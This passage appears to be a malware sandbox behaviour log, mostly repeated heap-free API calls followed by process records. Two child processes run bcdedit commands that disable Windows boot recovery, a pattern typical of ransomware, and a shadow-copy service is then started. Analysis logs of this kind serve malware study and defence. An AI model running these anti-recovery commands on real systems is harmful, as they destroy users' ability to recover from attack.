dwFlags=0x0, lpMem=0x2e1280 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12a0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12c0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12e0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1300 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1340 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1360 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1380 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13a0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13c0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13e0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1400 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1420 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1440 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1460 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1480 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14a0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14c0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14e0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1500 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1520 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1540 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1560 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1580 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15a0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15c0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15e0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1600 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1640 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1660 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1680 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16a0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16c0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16e0 | out: hHeap=0x2c0000) returned 1 [0231.655] GetProcessHeap () returned 0x2c0000 [0231.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1700 | out: hHeap=0x2c0000) returned 1 [0231.655] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1720 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1740 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1760 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1780 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17c0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17e0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1800 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1820 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1840 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1860 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18c0 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18e0 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1900 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1920 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1940 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1960 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1980 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19a0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19c0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19e0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a00 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a20 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a40 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a60 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a80 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1aa0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ac0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ae0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b00 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b20 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b40 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b60 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b80 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ba0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1bc0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1be0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c00 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c20 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c40 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c60 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c80 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ca0 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1cc0 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ce0 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d00 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d20 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d40 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d60 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d80 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1da0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1dc0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1de0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e00 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e20 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e40 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e60 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e80 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ea0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ec0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ee0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f00 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f20 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f40 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f60 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f80 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fa0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fc0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fe0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2000 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2020 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2040 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2060 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e20c0 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e20e0 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2100 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2120 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2140 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2160 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2180 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21a0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21c0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21e0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2200 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2220 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2240 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2260 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2280 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22a0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22c0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22e0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2300 | out: hHeap=0x2c0000) returned 1 [0231.672] exit (_Code=0) Thread: id = 34 os_tid = 0x7a8 Thread: id = 36 os_tid = 0x8b4 Thread: id = 37 os_tid = 0xa20 Thread: id = 38 os_tid = 0x3a4 Thread: id = 39 os_tid = 0x434 [0230.008] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x339190 [0230.009] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x345fa0 [0230.009] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x2fe580 [0230.009] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x347530 [0230.009] LocalReAlloc (hMem=0x2fe580, uBytes=0x20, uFlags=0x2) returned 0x347640 [0230.011] LocalFree (hMem=0x339190) returned 0x0 [0230.012] LocalFree (hMem=0x347530) returned 0x0 [0230.012] LocalFree (hMem=0x347640) returned 0x0 [0230.012] LocalFree (hMem=0x345fa0) returned 0x0 Process: id = "8" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x48663000" os_pid = "0x540" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x434" cmd_line = "bcdedit /set {current} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x2a8 Process: id = "9" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x49dc7000" os_pid = "0x7fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x634" cmd_line = "bcdedit /set {current} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x80c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x48b16000" os_pid = "0x81c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b7ab" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 26 os_tid = 0x8a0 Thread: id = 27 os_tid = 0x880 Thread: id = 28 os_tid = 0x86c Thread: id = 29 os_tid = 0x85c Thread: id = 30 os_tid = 0x84c Thread: id = 31 os_tid = 0x82c Thread: id = 33 os_tid = 0xa64 Thread: id = 130 os_tid = 0xa50 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 40 os_tid = 0x15c Thread: id = 41 os_tid = 0xbe4 Thread: id = 42 os_tid = 